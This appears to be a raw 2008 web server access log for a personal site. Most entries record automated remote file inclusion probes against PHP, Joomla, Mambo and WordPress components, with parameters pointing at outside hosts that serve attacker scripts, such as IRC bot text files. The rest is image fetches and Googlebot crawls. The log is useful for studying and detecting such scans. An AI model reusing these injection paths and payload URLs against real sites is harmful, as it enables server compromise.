202.171.48.7 - - [08/Feb/2008:08:02:50 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.11.181 - - [08/Feb/2008:08:03:03 -0800] "GET /logs/access_080201.log/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.surproyecto.com.ar/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [08/Feb/2008:08:03:04 -0800] "GET /logs/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.surproyecto.com.ar/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.1.62.200 - - [08/Feb/2008:08:04:10 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [08/Feb/2008:08:04:13 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:08:04:32 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:08:04:32 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
208.1.62.200 - - [08/Feb/2008:08:04:34 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [08/Feb/2008:08:04:38 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.71.13 - - [08/Feb/2008:08:04:49 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.247.71.13 - - [08/Feb/2008:08:04:50 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.9.152.104 - - [08/Feb/2008:08:05:25 -0800] "GET /logs/access_080122.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.152.104 - - [08/Feb/2008:08:05:25 -0800] "GET ///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.152.104 - - [08/Feb/2008:08:05:26 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [08/Feb/2008:08:05:30 -0800] "GET /logs/access_080117.log/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.surproyecto.com.ar/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.74.186.159 - - [08/Feb/2008:08:05:39 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.186.159 - - [08/Feb/2008:08:05:39 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.186.159 - - [08/Feb/2008:08:05:39 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.143.196 - - [08/Feb/2008:08:06:16 -0800] "GET /inc/shows.inc.php?cutepath=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.55.143.196 - - [08/Feb/2008:08:06:16 -0800] "GET /logs/inc/shows.inc.php?cutepath=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:08:06:23 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:08:06:23 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
220.128.148.83 - - [08/Feb/2008:08:06:38 -0800] "GET //include.php?path[docroot]=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.205.39.23 - - [08/Feb/2008:08:06:45 -0800] "GET /logs/access_080108.log/convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.205.39.23 - - [08/Feb/2008:08:06:46 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.205.39.23 - - [08/Feb/2008:08:06:48 -0800] "GET /logs/access_080108.log/convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.205.39.23 - - [08/Feb/2008:08:06:48 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.205.39.23 - - [08/Feb/2008:08:07:11 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.205.39.23 - - [08/Feb/2008:08:07:13 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.131 - - [08/Feb/2008:08:07:20 -0800] "GET /logs/access_071225.log//tool/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/bokepan_ya/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.131 - - [08/Feb/2008:08:07:20 -0800] "GET //tool/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/bokepan_ya/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.131 - - [08/Feb/2008:08:07:20 -0800] "GET /logs//tool/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/bokepan_ya/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.131 - - [08/Feb/2008:08:07:31 -0800] "GET /logs/access_071220.log//tool/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/bokepan_ya/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.128.148.83 - - [08/Feb/2008:08:07:35 -0800] "GET //include.php?path[docroot]=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.33.210 - - [08/Feb/2008:08:08:13 -0800] "GET /logs/access_080117.log/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:08:08:43 -0800] "GET //vwar/admin/?vwar_root=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:08:08:44 -0800] "GET /logs//vwar/admin/?vwar_root=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:08:09:26 -0800] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:08:09:31 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:08:09:32 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.151.23.213 - - [08/Feb/2008:08:10:12 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
62.151.23.213 - - [08/Feb/2008:08:10:12 -0800] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
59.106.20.28 - - [08/Feb/2008:08:10:33 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.205.39.23 - - [08/Feb/2008:08:10:45 -0800] "GET /logs/access_080108.log/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.205.39.23 - - [08/Feb/2008:08:10:45 -0800] "GET /logs/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.205.39.23 - - [08/Feb/2008:08:10:47 -0800] "GET /logs/access_080108.log/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.205.39.23 - - [08/Feb/2008:08:10:47 -0800] "GET /logs/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:08:11:04 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:08:11:04 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
82.192.68.20 - - [08/Feb/2008:08:12:41 -0800] "GET //account.php?action=http://www.pixeloutlet.com/cart/templates_c/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.247.71.13 - - [08/Feb/2008:08:12:52 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.247.71.13 - - [08/Feb/2008:08:12:53 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:08:14:37 -0800] "GET /logs/access_080108.log/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:08:14:37 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:08:14:43 -0800] "GET /logs/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:08:15:01 -0800] "GET /logs/access_080108.log/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:08:15:03 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.143.196 - - [08/Feb/2008:08:15:03 -0800] "GET /inc/shows.inc.php?cutepath=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
72.55.143.196 - - [08/Feb/2008:08:15:04 -0800] "GET /logs/inc/shows.inc.php?cutepath=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:08:15:08 -0800] "GET /logs/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:08:15:24 -0800] "GET /logs/access_071230.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:08:15:25 -0800] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:08:15:26 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.18.211.206 - - [08/Feb/2008:08:15:31 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ultimatemusiclessons.com/images/gibson.gif???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.18.211.206 - - [08/Feb/2008:08:15:31 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ultimatemusiclessons.com/images/gibson.gif???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.18.211.206 - - [08/Feb/2008:08:15:32 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ultimatemusiclessons.com/images/gibson.gif???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.239.16.35 - - [08/Feb/2008:08:15:45 -0800] "GET /survey2/classes/core/language.php?rootdir=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.10.158.86 - - [08/Feb/2008:08:16:05 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.158.86 - - [08/Feb/2008:08:16:06 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.158.86 - - [08/Feb/2008:08:16:06 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:08:16:11 -0800] "GET /logs/access_080108.log/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:08:16:11 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:08:16:13 -0800] "GET /logs/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:08:16:48 -0800] "GET /logs/access_080101.log/index.php?redir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:08:16:48 -0800] "GET /index.php?redir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:08:16:48 -0800] "GET /logs/index.php?redir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.43.230.137 - - [08/Feb/2008:08:17:53 -0800] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 200 291037 "http://www.st-owners.com/forums/showthread.php?p=383656#post383656" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [08/Feb/2008:08:17:53 -0800] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 200 335611 "http://www.st-owners.com/forums/showthread.php?p=383656#post383656" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [08/Feb/2008:08:17:54 -0800] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 200 243937 "http://www.st-owners.com/forums/showthread.php?p=383656#post383656" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [08/Feb/2008:08:17:55 -0800] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 200 275747 "http://www.st-owners.com/forums/showthread.php?p=383656#post383656" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [08/Feb/2008:08:17:56 -0800] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 200 310940 "http://www.st-owners.com/forums/showthread.php?p=383656#post383656" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [08/Feb/2008:08:17:56 -0800] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 200 316892 "http://www.st-owners.com/forums/showthread.php?p=383656#post383656" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [08/Feb/2008:08:17:58 -0800] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 200 313284 "http://www.st-owners.com/forums/showthread.php?p=383656#post383656" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
66.249.70.19 - - [08/Feb/2008:08:18:42 -0800] "GET /logs/access_070819.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [08/Feb/2008:08:18:47 -0800] "GET /bikes/dteel/10MAR07/ HTTP/1.1" 200 849 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
220.134.235.165 - - [08/Feb/2008:08:19:47 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.152.104 - - [08/Feb/2008:08:20:04 -0800] "GET /logs/access_080122.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.152.104 - - [08/Feb/2008:08:20:04 -0800] "GET ///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.152.104 - - [08/Feb/2008:08:20:04 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.237.132.84 - - [08/Feb/2008:08:20:07 -0800] "GET /logs/access_080122.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.237.132.84 - - [08/Feb/2008:08:20:07 -0800] "GET ///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.237.132.84 - - [08/Feb/2008:08:20:08 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.237.132.84 - - [08/Feb/2008:08:20:26 -0800] "GET /logs/access_080122.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.128.148.83 - - [08/Feb/2008:08:20:28 -0800] "GET /logs/access.log//include.php?path[docroot]=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.128.148.83 - - [08/Feb/2008:08:20:30 -0800] "GET //include.php?path[docroot]=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.128.148.83 - - [08/Feb/2008:08:20:31 -0800] "GET /logs//include.php?path[docroot]=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.132.84 - - [08/Feb/2008:08:20:32 -0800] "GET ///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.128.148.83 - - [08/Feb/2008:08:20:33 -0800] "GET /logs/access.log//include.php?path[docroot]=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [08/Feb/2008:08:20:33 -0800] "GET /retreat1/webcam/ HTTP/1.1" 200 2596932 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
220.128.148.83 - - [08/Feb/2008:08:20:34 -0800] "GET //include.php?path[docroot]=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.132.84 - - [08/Feb/2008:08:20:34 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.128.148.83 - - [08/Feb/2008:08:20:35 -0800] "GET /logs//include.php?path[docroot]=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.171.48.7 - - [08/Feb/2008:08:20:40 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [08/Feb/2008:08:20:40 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [08/Feb/2008:08:20:40 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.70.19 - - [08/Feb/2008:08:21:37 -0800] "GET /logs/access_071206.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [08/Feb/2008:08:21:44 -0800] "GET /logs/access_071207.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:08:22:03 -0800] "GET /logs//classes.php?LOCAL_PATH=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:08:22:03 -0800] "GET //classes.php?LOCAL_PATH=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
66.249.70.19 - - [08/Feb/2008:08:22:23 -0800] "GET /logs/access_071112.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
